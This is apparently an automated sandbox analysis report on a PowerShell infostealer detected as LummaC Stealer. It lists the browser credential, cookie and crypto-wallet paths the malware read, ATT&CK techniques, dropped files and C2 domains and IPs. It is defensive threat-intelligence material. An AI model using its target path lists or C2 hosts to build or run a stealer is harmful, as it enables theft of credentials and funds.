                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                    Source: Yara matchFile source: 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2055763748.0000000000765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2070770493.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2119642948.0000000000766000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2090149211.0000000000767000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2138816482.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2070467409.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation                    		11
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		11
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    PowerShell                    		1
                    Registry Run Keys / Startup Folder                    		11
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		LSASS Memory11
                    File and Directory Discovery                    		Remote Desktop Protocol31
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)211
                    Process Injection                    		2
                    Obfuscated Files or Information                    		Security Account Manager122
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive21
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		1
                    Install Root Certificate                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging115
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Timestomp                    		Cached Domain Credentials121
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    DLL Side-Loading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Masquerading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558794 Sample: xaSPJNbl.ps1 Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 68 rentry.co 2->68 70 5ptit5tuded.cyou 2->70 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Antivirus detection for URL or domain 2->80 84 8 other signatures 2->84 11 powershell.exe 1 189 2->11         started        15 Setup.exe 2 2->15         started        17 Setup.exe 2->17         started        signatures3 82 Connects to a pastebin service (likely for C&C) 68->82 process4 file5 58 C:\...\api-ms-win-crt-process-l1-1-0.dll, PE32+ 11->58 dropped 60 C:\...\api-ms-win-crt-private-l1-1-0.dll, PE32+ 11->60 dropped 62 C:\...\api-ms-win-crt-multibyte-l1-1-0.dll, PE32+ 11->62 dropped 64 53 other files (46 malicious) 11->64 dropped 100 Submitted sample is a known malware sample 11->100 102 Found suspicious powershell code related to unpacking or dynamic code loading 11->102 104 Loading BitLocker PowerShell Module 11->104 106 Powershell drops PE file 11->106 19 Setup.exe 13 11->19         started        23 conhost.exe 11->23         started        108 Maps a DLL or memory area into another process 15->108 110 Found direct / indirect Syscall (likely to bypass EDR) 15->110 25 more.com 2 15->25         started        signatures6 process7 file8 46 C:\Users\user\AppData\...\libssl-1_1-x64.dll, PE32+ 19->46 dropped 48 C:\Users\user\...\libcrypto-1_1-x64.dll, PE32+ 19->48 dropped 50 C:\Users\user\AppData\...\Qt5Network.dll, PE32+ 19->50 dropped 54 6 other files (1 malicious) 19->54 dropped 86 Maps a DLL or memory area into another process 19->86 88 Found direct / indirect Syscall (likely to bypass EDR) 19->88 27 more.com 2 19->27         started        52 C:\Users\user\AppData\Local\Temp\accpl, PE32 25->52 dropped 90 Writes to foreign memory regions 25->90 31 conhost.exe 25->31         started        33 msiexec.exe 25->33         started        signatures9 process10 file11 66 C:\Users\user\AppData\Local\Temp\ktb, PE32 27->66 dropped 112 Writes to foreign memory regions 27->112 114 Found hidden mapped module (file has been removed from disk) 27->114 116 Maps a DLL or memory area into another process 27->116 118 2 other signatures 27->118 35 msiexec.exe 1 27->35         started        40 conhost.exe 27->40         started        signatures12 process13 dnsIp14 72 5ptit5tuded.cyou 188.114.97.3, 443, 49709, 49710 CLOUDFLARENETUS European Union 35->72 74 rentry.co 172.67.75.40, 443, 49718 CLOUDFLARENETUS United States 35->74 56 C:\Users\...\2NTZ8H8AG941JFZKJESP7NAC.ps1, HTML 35->56 dropped 92 Query firmware table information (likely to detect VMs) 35->92 94 Found many strings related to Crypto-Wallets (likely being stolen) 35->94 96 Tries to harvest and steal browser information (history, passwords, etc) 35->96 98 2 other signatures 35->98 42 powershell.exe 7 35->42         started        file15 signatures16 process17 process18 44 conhost.exe 42->44         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    xaSPJNbl.ps10%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\accpl100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\ktb100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\accpl50%ReversingLabsWin32.Trojan.MintZard
                    C:\Users\user\AppData\Local\Temp\ktb50%ReversingLabsWin32.Trojan.MintZard
                    C:\Users\user\AppData\Roaming\DUC\Qt5Core.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\Qt5Network.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\libssl-1_1-x64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\msvcp140_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\steam_api64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\vcruntime140_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\config.prx0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prx0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dll3%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dll0%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dll2%ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dll0%ReversingLabs
